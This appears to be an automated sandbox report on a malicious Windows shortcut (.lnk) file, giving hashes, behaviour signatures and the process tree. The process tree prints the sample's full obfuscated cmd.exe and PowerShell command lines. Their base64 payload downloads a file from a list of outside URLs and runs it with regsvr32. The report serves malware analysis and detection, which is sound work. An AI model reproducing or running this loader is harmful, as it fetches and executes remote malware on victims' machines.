Analysis
-
max time kernel
122s -
max time network
129s -
platform
windows7_x64 -
resource
win7-20241010-en -
resource tags
arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system -
submitted
13-11-2024 21:38
Static task
static1
Behavioral task
behavioral1
Sample
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
Resource
win7-20241010-en
Behavioral task
behavioral2
Sample
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
Resource
win10v2004-20241007-en
General
-
Target
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk
-
Size
2KB
-
MD5
e567fd6bd2ad541ea7cff36788a1cb04
-
SHA1
335983d1da7118026ec9cb6befd1cbd3a84edf9b
-
SHA256
ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b
-
SHA512
fba256493c808dfae95cac6282f23ec756ce1d6b9ee7fe3ad8f70d43dce4569a3830467c4d30d6d2fac8479497a819c186a997b70ce84ab444f66bc4334cf67c
Malware Config
Signatures
-
An obfuscated cmd.exe command-line is typically used to evade detection. 1 IoCs
Processes:
cmd.exepid Process 2424 cmd.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes:
powershell.exepid Process 2532 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid Process Token: SeDebugPrivilege 2532 powershell.exe -
Suspicious use of WriteProcessMemory 6 IoCs
Processes:
cmd.execmd.exedescription pid Process procid_target PID 2368 wrote to memory of 2424 2368 cmd.exe 31 PID 2368 wrote to memory of 2424 2368 cmd.exe 31 PID 2368 wrote to memory of 2424 2368 cmd.exe 31 PID 2424 wrote to memory of 2532 2424 cmd.exe 32 PID 2424 wrote to memory of 2532 2424 cmd.exe 32 PID 2424 wrote to memory of 2532 2424 cmd.exe 32
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ac680c9da9b99915da3aeac996d04431b21227f59d55288fac95a8038ba4532b.lnk1⤵
- Suspicious use of WriteProcessMemory
PID:2368 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /v:on /c Vy+KY28nm8jrFR/pN6hHEEnR9ZQSXCM52YkkW9kA5wMTB3nmG+JcpYgkGoLMzE+MnYyHqio9||goto&p^o^w^e^r^s^h^e^l^l.e^x^e -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:2424 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -c "&{$xW='ICAgICAgV3JpdGUtSG9zdCAiclRnU0UiOyRQcm9ncmVzc1ByZWZlcmVuY2U9IlNpbGVudGx5Q29udGludWUiOyRsaW5rcz0oImh0dHA6Ly9tYXN0ZXJmbGl4LmNvbS9PdmVydmlldy9RQTRTRTBEeENDRlM1VzhueEcvIiwiaHR0cDovL21hc3l1ay5jb20vNTgxdm95emUvQ1MvIiwiaHR0cDovL2xla2Fya2l2ZXQuc2UvaW5jbHVkZXMvbENZejNPMDdEMENtQVMvIiwiaHR0cDovL21hcnR5ci5kay94Mmhka2o1ZS8iLCJodHRwOi8vbWFydGluZ3JhbnQuY29tL2NnaS1iaW4veFJKWTEvIiwiaHR0cDovL2xlbW9uY2luZS5jb20vY3NzL2xqSXl5SEZ0dDZHSE9WZHdsSmIvIiwiaHR0cDovL21hbmRvbS5jby5pZC9hc3NldHMvZWpldnc4MktKNlZZRHpaWTNPLyIpOyR0PSJJd25NcyI7JGQ9IiRlbnY6VE1QXC4uXCR0Ijtta2RpciAtZm9yY2UgJGQgfCBvdXQtbnVsbDtmb3JlYWNoICgkdSBpbiAkbGlua3MpIHt0cnkge0lXUiAkdSAtT3V0RmlsZSAkZFxjSEtFc3RqaGZKLnVERDtSZWdzdnIzMi5leGUgIiRkXGNIS0VzdGpoZkoudUREIjticmVha30gY2F0Y2ggeyB9fQ==';$Ma=[System.Convert]::FromBase64String($xW);$Hw=[System.Text.Encoding]::ASCII.GetString($Ma); iex ($Hw)}"3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2532
-
-